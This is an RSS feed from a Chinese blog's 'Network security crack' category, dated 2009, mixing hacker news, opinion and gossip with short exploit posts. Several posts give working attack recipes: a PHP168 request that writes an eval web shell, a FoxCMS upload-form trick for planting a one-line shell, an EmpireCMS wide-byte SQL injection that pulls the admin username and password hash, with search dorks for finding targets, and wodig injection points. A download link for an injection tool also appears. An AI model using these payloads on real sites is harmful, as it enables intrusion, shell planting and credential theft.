<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>P9's BLOG &#187; Network security crack</title>
	<atom:link href="http://www.p9.net.cn/category/sec/feed" rel="self" type="application/rss+xml" />
	<link>http://www.p9.net.cn</link>
	<description>同一天地间,同一网络下,P9'Blog与您共享今日互联网→WWW.P9.NET.CN</description>
	<lastBuildDate>Thu, 29 Jul 2010 01:10:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>php1686.0被爆0day可瞬间获得webshell</title>
		<link>http://www.p9.net.cn/sec/php168600day.html</link>
		<comments>http://www.p9.net.cn/sec/php168600day.html#comments</comments>
		<pubDate>Wed, 09 Sep 2009 00:17:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2911</guid>
		<description><![CDATA[php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&#38;chdb[htmlname]=ccc.php&#38;chdb[path]=cache&#38;content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&amp;chdb[htmlname]=ccc.php&amp;chdb[path]=cache&amp;content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2911&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2911" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/php168600day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>首个黑客网站宏盟获千万融资</title>
		<link>http://www.p9.net.cn/sec/hongmeng1000.html</link>
		<comments>http://www.p9.net.cn/sec/hongmeng1000.html#comments</comments>
		<pubDate>Sat, 18 Jul 2009 23:50:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2497</guid>
		<description><![CDATA[一个国人黑客联盟网站中国红盟近日发布消息将被浙江老板融资1000万元.这也是目前国内黑客网站接收到的最大融资,破纪录的达到了1千万.红盟掌门刘庆在接受采访时说红盟目前每年的营业额是5到6百万,明年预计会突破一千万.红盟的收入来源主要是服务器安全服务,目前国内很多游戏运营商和机房都是他们做的安全,特别是上海地区.另外他们还自己开发了服务器安全软件.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_2498" class="wp-caption alignright" style="width: 109px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-2498" title="红盟" src="http://www.p9.net.cn/wp-content/uploads/2009/07/hongmeng.jpg" alt="红盟" width="99" height="120" /></a><p class="wp-caption-text">红盟</p></div>
<p>一个国人黑客联盟网站中国红盟近日发布消息将被浙江老板融资1000万元.这也是目前国内黑客网站接收到的最大融资,破纪录的达到了1千万.红盟掌门刘庆在接受采访时说红盟目前每年的营业额是5到6百万,明年预计会突破一千万.红盟的收入来源主要是服务器安全服务,目前国内很多游戏运营商和机房都是他们做的安全,特别是上海地区.另外他们还自己开发了服务器安全软件.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2497&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2497" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/hongmeng1000.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>风讯4.0 sp7 0day漏洞</title>
		<link>http://www.p9.net.cn/sec/fengxun40sp7-0day.html</link>
		<comments>http://www.p9.net.cn/sec/fengxun40sp7-0day.html#comments</comments>
		<pubDate>Tue, 14 Jul 2009 23:14:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2455</guid>
		<description><![CDATA[转自:零客 发现者：bloodsword bink
漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.xxx.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&#38;Type=AddFolder&#38;Path=/userfiles/
06150583700/aaa.asp//&#38;CurrPath=/userfiles/06150583700
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：
&#60;form name=&#8221;FileForm&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart/form-data&#8221; action=&#8221;http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp&#8221;&#62;
    &#60;input type=&#8221;hidden&#8221; name=&#8221;AutoReName&#8221; value=&#8221;2&#8243;&#62;&#60;br&#62;
    &#60;input type=&#8221;hidden&#8221; name=&#8221;Path&#8221; value=&#8221;/userfiles/06150583700/aaa.asp&#8221;&#62;
    &#60;input type=&#8221;file&#8221; size=&#8221;20&#8243; name=&#8221;File1&#8243;&#62;
    &#60;input type=&#8221;hidden&#8221; name=&#8221;FilesNum&#8221; value=&#8221;1&#8243;&#62;
    &#60;input type=&#8221;submit&#8221; id=&#8221;BtnSubmit&#8221; name=&#8221;Submit&#8221; value=&#8221; 确 定 &#8220;&#62;
    &#60;input type=&#8221;reset&#8221; id=&#8221;ResetForm&#8221; name=&#8221;Submit3&#8243; value=&#8221; 重 填 &#8220;&#62;
&#60;/form&#62;
传个夹带一句话的图片上去
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>转自:零客 发现者：bloodsword bink<br />
漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录<br />
首先注册个账号访问http://www.<span style="color: #000000;">xxx</span>.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&amp;Type=AddFolder&amp;Path=/userfiles/</p>
<p>06150583700/aaa.asp//&amp;CurrPath=/userfiles/06150583700<span id="more-2455"></span><br />
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录<br />
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：<br />
&lt;form name=&#8221;FileForm&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart/form-data&#8221; action=&#8221;http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp&#8221;&gt;<br />
    &lt;input type=&#8221;hidden&#8221; name=&#8221;AutoReName&#8221; value=&#8221;2&#8243;&gt;&lt;br&gt;<br />
    &lt;input type=&#8221;hidden&#8221; name=&#8221;Path&#8221; value=&#8221;/userfiles/06150583700/aaa.asp&#8221;&gt;<br />
    &lt;input type=&#8221;file&#8221; size=&#8221;20&#8243; name=&#8221;File1&#8243;&gt;<br />
    &lt;input type=&#8221;hidden&#8221; name=&#8221;FilesNum&#8221; value=&#8221;1&#8243;&gt;<br />
    &lt;input type=&#8221;submit&#8221; id=&#8221;BtnSubmit&#8221; name=&#8221;Submit&#8221; value=&#8221; 确 定 &#8220;&gt;<br />
    &lt;input type=&#8221;reset&#8221; id=&#8221;ResetForm&#8221; name=&#8221;Submit3&#8243; value=&#8221; 重 填 &#8220;&gt;<br />
&lt;/form&gt;<br />
传个夹带一句话的图片上去<br />
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有<br />
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2455&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2455" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/fengxun40sp7-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>炒作可以但是请别拿黑客来说事</title>
		<link>http://www.p9.net.cn/sec/chaozuoheike.html</link>
		<comments>http://www.p9.net.cn/sec/chaozuoheike.html#comments</comments>
		<pubDate>Mon, 29 Jun 2009 00:31:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2225</guid>
		<description><![CDATA[最近一段时间网上突然冒出一帮推客炒手,他们炒作的目的虽然不同但是目标无一不指向黑客,纷纷扛着洁身自好忧天下人之优的面孔对黑客指指点点一副哗众取宠的嘴脸,仿佛他骂了黑客他的人格就清高了.在他们的精彩文笔下中国的黑客好男儿们无一不被他们描述成一些专门放马盗号,揭人私隐,破坏网络友爱和上网环境等等类型的坏蛋或无法救要网络蛀虫.某些炒手甚至上升到把黑客和中国经济以及未来挂钩了,什么楼市火了要防黑客,股市火了也要防黑客,某软件火了也要防黑客,就连学生考试了还是要防黑客.更有甚者还把迈克尔杰克逊的死讯也和黑客挂上了钩,广州路由器出现问题造成网络堵塞也挂钩了,某超女退出也说是黑客爆了啥私隐.我caoTM的自从上次全国断网事件后,这些炒手们就好像抓住了救命稻草似的拼命的侮辱着黑客,明着一波接一波的带着救世主和先知的面具恶狠狠地用他们那张臭嘴ddos黑客们,暗中却又像哈巴狗一样跟在黑客后面哭爹喊娘的想学点对于他们来说就和茅山道术差不多的黑人神功,梦想着也成为其中的一员.这帮无良的东西就知道写些东西屏蔽网民的眼睛,在国家出现种种危机,当国人被侮辱的时候你们这帮杂种跑哪去了,还不是黑客提咱老百姓出头,一次次中日中美中法黑客大战一次次保家卫国难道都是你们这些无良炒手上的战场吗?事后你们有良知的还知道写个帖子啥的夸夸他们,中立的保持沉默,无良的呢甚至反咬一口说什么招来了更大的攻击波一副tm狗汉奸嘴脸,投降主义路线.今天这篇博文我是写痛快了也骂舒坦了,归根结底一句话请不要用有色的眼睛看待中国黑客,他们不过是一群有理想有技术的孤独群体,他们在大家视线的背后默默的保家卫国维护着国人和祖国的尊严维护着国内互联网的安全与稳定,他们不愿意高调不愿意出来反驳但是我们不能不明真相,不能去诬陷这么一群中国网络守护神,你想想那会多伤他们的心啊.最后也恳请占了99%的有良知的炒手多写写中国黑客的正面示例,强力反击下那些只占1%的无良炒手.我爱中国黑客我为你们自豪.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="黑客安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="别拿黑客说事" width="90" height="100" /></a><p class="wp-caption-text">别拿黑客说事</p></div>
<p>最近一段时间网上突然冒出一帮推客炒手,他们炒作的目的虽然不同但是目标无一不指向黑客,纷纷扛着洁身自好忧天下人之优的面孔对黑客指指点点一副哗众取宠的嘴脸,仿佛他骂了黑客他的人格就清高了.在他们的精彩文笔下中国的黑客好男儿们无一不被他们描述成一些专门放马盗号,揭人私隐,破坏网络友爱和上网环境等等类型的坏蛋或无法救要网络蛀虫.某些炒手甚至上升到把黑客和中国经济以及未来挂钩了,什么楼市火了要防黑客,股市火了也要防黑客,某软件火了也要防黑客,就连学生考试了还是要防黑客.更有甚者还把迈克尔杰克逊的死讯也和黑客挂上了钩,广州路由器出现问题造成网络堵塞也挂钩了,某超女退出也说是黑客爆了啥私隐.我caoTM的自从上次全国断网事件后,这些炒手们就好像抓住了救命稻草似的拼命的侮辱着黑客,明着一波接一波的带着救世主和先知的面具恶狠狠地用他们那张臭嘴ddos黑客们,暗中却又像哈巴狗一样跟在黑客后面哭爹喊娘的想学点对于他们来说就和茅山道术差不多的黑人神功,梦想着也成为其中的一员.这帮无良的东西就知道写些东西屏蔽网民的眼睛,在国家出现种种危机,当国人被侮辱的时候你们这帮杂种跑哪去了,还不是黑客提咱老百姓出头,一次次中日中美中法黑客大战一次次保家卫国难道都是你们这些无良炒手上的战场吗?事后你们有良知的还知道写个帖子啥的夸夸他们,中立的保持沉默,无良的呢甚至反咬一口说什么招来了更大的攻击波一副tm狗汉奸嘴脸,投降主义路线.今天这篇博文我是写痛快了也骂舒坦了,归根结底一句话请不要用有色的眼睛看待中国黑客,他们不过是一群有理想有技术的孤独群体,他们在大家视线的背后默默的保家卫国维护着国人和祖国的尊严维护着国内互联网的安全与稳定,他们不愿意高调不愿意出来反驳但是我们不能不明真相,不能去诬陷这么一群中国网络守护神,你想想那会多伤他们的心啊.最后也恳请占了99%的有良知的炒手多写写中国黑客的正面示例,强力反击下那些只占1%的无良炒手.我爱中国黑客我为你们自豪.</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2225&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2225" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/chaozuoheike.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>10个新手学习黑客技术的最佳网站</title>
		<link>http://www.p9.net.cn/sec/10webs-hacker.html</link>
		<comments>http://www.p9.net.cn/sec/10webs-hacker.html#comments</comments>
		<pubDate>Fri, 19 Jun 2009 02:39:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=2015</guid>
		<description><![CDATA[这十个网站都配有入侵视频教程和详细的漏洞文章以及黑客软件,全部由浅入深,浅到基本的编程和漏洞利用,深到高级编程和漏洞挖掘.以下我一一列出这十个网站注意排名不分先后黑客动画吧:http://www.hack58.com/ 安全中国:http://www.anqn.com/ 黑鹰安全网:http://www.3800hk.com/ 华夏黑客同盟:http://www.77169.com/ 新世纪网安基地:http://www.520hack.com/ 黑客基地:http://www.hackbase.com/ 红色黑客联盟:http://www.7747.net/ 黑客防线:http://www.hacker.com.cn/ 漏洞数据库:http://www.sebug.net/ 邪恶八进制:http://www.eviloctal.com/ 暗组信息安全论坛:http://www.darkst.com/
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption aligncenter" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="黑客安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="新手黑客学习网站" width="90" height="100" /></a><p class="wp-caption-text">新手黑客学习网站</p></div>
<p>这十个网站都配有入侵视频教程和详细的漏洞文章以及黑客软件,全部由浅入深,浅到基本的编程和漏洞利用,深到高级编程和漏洞挖掘.以下我一一列出这十个网站注意排名不分先后黑客动画吧:http://www.hack58.com/ 安全中国:http://www.anqn.com/ 黑鹰安全网:http://www.3800hk.com/ 华夏黑客同盟:http://www.77169.com/ 新世纪网安基地:http://www.520hack.com/ 黑客基地:http://www.hackbase.com/ 红色黑客联盟:http://www.7747.net/ 黑客防线:http://www.hacker.com.cn/ 漏洞数据库:http://www.sebug.net/ 邪恶八进制:http://www.eviloctal.com/ 暗组信息安全论坛:http://www.darkst.com/</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=2015&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_2015" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/10webs-hacker.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>帝国cms 0day e/tool/gbook/?bid=1</title>
		<link>http://www.p9.net.cn/sec/ecms-0day-gbookbid.html</link>
		<comments>http://www.p9.net.cn/sec/ecms-0day-gbookbid.html#comments</comments>
		<pubDate>Sun, 14 Jun 2009 00:46:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1935</guid>
		<description><![CDATA[帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代
然后在联系邮箱处填,1,1,1,(select concat(username,0&#215;5f,password,0&#215;5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到http://www.cmd5.com/或http://www.xmd5.com/查询.帝国cms管理后台地址是e/admin/
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1936" class="wp-caption alignright" style="width: 208px"><a href="http://www.p9.net.cn/tag/0day"><img class="size-full wp-image-1936" title="帝国cms 0day" src="http://www.p9.net.cn/wp-content/uploads/2009/06/ecms0day.jpg" alt="帝国cms 0day" width="198" height="49" /></a><p class="wp-caption-text">帝国cms 0day</p></div>
<p>帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1<br />
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代<br />
然后在联系邮箱处填,1,1,1,(select concat(username,0&#215;5f,password,0&#215;5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*<br />
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到<a href="http://www.cmd5.com/">http://www.cmd5.com/</a>或<a href="http://www.xmd5.com/">http://www.xmd5.com/</a>查询.帝国cms管理后台地址是e/admin/</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1935&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1935" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ecms-0day-gbookbid.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pangolin v2.3.0.948注入工具下载</title>
		<link>http://www.p9.net.cn/sec/pangolin-v230948.html</link>
		<comments>http://www.p9.net.cn/sec/pangolin-v230948.html#comments</comments>
		<pubDate>Wed, 27 May 2009 01:15:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1644</guid>
		<description><![CDATA[这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1645" class="wp-caption alignright" style="width: 120px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-1645" title="pangolin注入工具" src="http://www.p9.net.cn/wp-content/uploads/2009/05/pangolin.jpg" alt="pangolin2.3.0.948注入工具下载" width="110" height="94" /></a><p class="wp-caption-text">pangolin2.3.0.948注入工具下载</p></div>
<p>这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:<a href="http://www.nosec.org/zh-hans/pangolin_download.html" target="_blank">http://www.nosec.org/zh-hans/pangolin_download.html</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1644&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1644" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/pangolin-v230948.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>落伍者论坛疑遭黑客入侵用户密码泄露</title>
		<link>http://www.p9.net.cn/sec/im286-hacker.html</link>
		<comments>http://www.p9.net.cn/sec/im286-hacker.html#comments</comments>
		<pubDate>Sat, 23 May 2009 08:26:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1596</guid>
		<description><![CDATA[国内最大的站长聚集地落伍者论坛,今天下午突然出现大量用户密码被盗现象,经多方核查发现原来并不是落伍者主站被黑客入侵,而是因去年测试的落伍者分类信息分站被入侵,导致数百用户信息今天被披露到网上,才引发的今日大量用户密码被盗现象.目前落伍的站长拒绝游泳的鱼已经发布广告,被盗用户可以联系QQ:288753恢复密码.积分损失可找小瑜补偿,落伍公告地址:http://www.im286.com/thread-3563529-1-1.html
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1597" class="wp-caption alignright" style="width: 160px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-thumbnail wp-image-1597" title="落伍者论坛疑遭黑客入侵大量用户密码被盗" src="http://www.p9.net.cn/wp-content/uploads/2009/05/im286-150x75.gif" alt="落伍者论坛疑遭黑客入侵大量用户密码被盗" width="150" height="75" /></a><p class="wp-caption-text">落伍者论坛疑遭黑客入侵大量用户密码被盗</p></div>
<p>国内最大的站长聚集地落伍者论坛,今天下午突然出现大量用户密码被盗现象,经多方核查发现原来并不是落伍者主站被黑客入侵,而是因去年测试的落伍者分类信息分站被入侵,导致数百用户信息今天被披露到网上,才引发的今日大量用户密码被盗现象.目前落伍的站长拒绝游泳的鱼已经发布广告,被盗用户可以联系QQ:288753恢复密码.积分损失可找小瑜补偿,落伍公告地址:<a href="http://www.im286.com/thread-3563529-1-1.html" target="_blank">http://www.im286.com/thread-3563529-1-1.html</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1596&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1596" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/im286-hacker.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>wodig注入漏洞</title>
		<link>http://www.p9.net.cn/sec/wodig-pours-into-the-crack.html</link>
		<comments>http://www.p9.net.cn/sec/wodig-pours-into-the-crack.html#comments</comments>
		<pubDate>Fri, 22 May 2009 00:48:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1578</guid>
		<description><![CDATA[wodig漏洞文件Default.asp?tags_name=a&#8217;
article.asp?Src_Child=1&#38;Src_ChildSub=a&#8217;
wodig.asp?tags_name=a&#8217;这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/注入"><img class="size-full wp-image-690" title="黑客安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="wodig注入漏洞" width="90" height="100" /></a><p class="wp-caption-text">wodig注入漏洞</p></div>
<p>wodig漏洞文件Default.asp?tags_name=a&#8217;</p>
<p>article.asp?Src_Child=1&amp;Src_ChildSub=a&#8217;</p>
<p>wodig.asp?tags_name=a&#8217;这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1578&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1578" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/wodig-pours-into-the-crack.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>最美女黑客Yingcracker照片属台湾陈师迪</title>
		<link>http://www.p9.net.cn/sec/yingcracker-hacker-chenshidi.html</link>
		<comments>http://www.p9.net.cn/sec/yingcracker-hacker-chenshidi.html#comments</comments>
		<pubDate>Wed, 20 May 2009 01:10:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[美女]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1555</guid>
		<description><![CDATA[走红网络的美女黑客Yingcracker近日被网友曝光其所用照片属于台湾女子陈师迪,陈师迪是台湾省国立大学法律系毕业,她表示保留控诉Yingcracker侵犯肖像权和隐私权的权利.相关美女黑客Yingcracker介绍
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1438" class="wp-caption alignright" style="width: 114px"><a href="http://www.p9.net.cn/tag/美女"><img class="size-full wp-image-1438" title="最美女黑客" src="http://www.p9.net.cn/wp-content/uploads/2009/05/yingcracker3.jpg" alt="最美女黑客YingCracker盗用陈师迪照片" width="104" height="139" /></a><p class="wp-caption-text">最美女黑客YingCracker盗用陈师迪照片</p></div>
<p>走红网络的美女黑客Yingcracker近日被网友曝光其所用照片属于台湾女子陈师迪,陈师迪是台湾省国立大学法律系毕业,她表示保留控诉Yingcracker侵犯肖像权和隐私权的权利.<a href="http://www.p9.net.cn/sec/yingcracker.html" target="_blank">相关美女黑客Yingcracker介绍</a><span id="more-1555"></span></p>
<div id="attachment_1556" class="wp-caption alignleft" style="width: 114px"><a href="http://www.p9.net.cn/tag/美女"><img class="size-full wp-image-1556 " title="陈师迪照片" src="http://www.p9.net.cn/wp-content/uploads/2009/05/chenshidi.jpg" alt="陈师迪照片" width="104" height="139" /></a><p class="wp-caption-text">陈师迪照片</p></div>
<div id="attachment_1557" class="wp-caption alignleft" style="width: 114px"><a href="http://www.p9.net.cn/tag/美女"><img class="size-full wp-image-1557" title="陈师迪" src="http://www.p9.net.cn/wp-content/uploads/2009/05/chenshidi1.jpg" alt="陈师迪" width="104" height="139" /></a><p class="wp-caption-text">陈师迪</p></div>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1555&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1555" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/yingcracker-hacker-chenshidi.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>美女黑客yingcracker</title>
		<link>http://www.p9.net.cn/sec/yingcracker.html</link>
		<comments>http://www.p9.net.cn/sec/yingcracker.html#comments</comments>
		<pubDate>Fri, 08 May 2009 00:07:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[美女]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1434</guid>
		<description><![CDATA[中国黑客有很多但是要说到美女黑客恐怕只有这么一位,YingCracker上海姑娘一位靠带徒弟,卖0day的职业黑客.有黑客界的朋友爆料说拜师YingCracker门下需要4千元到8千元不等.YingCracker不仅人长的漂亮而且技术也绝不比男性黑客差,尤其是交友广泛,手里的0day数不胜数.让一帮小黑fans们羡慕的直流口水.在这里祝愿国内新一代黑客早日成长,更希望能多出几个YingCracker这样的有技术有身材有相貌的美女黑客.
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_1435" class="wp-caption alignright" style="width: 310px"><a href="http://www.p9.net.cn/tag/美女"><img class="size-full wp-image-1435" title="yingcracker" src="http://www.p9.net.cn/wp-content/uploads/2009/05/yingcracker.jpg" alt="YingCracker" width="300" height="225" /></a><p class="wp-caption-text">YingCracker</p></div>
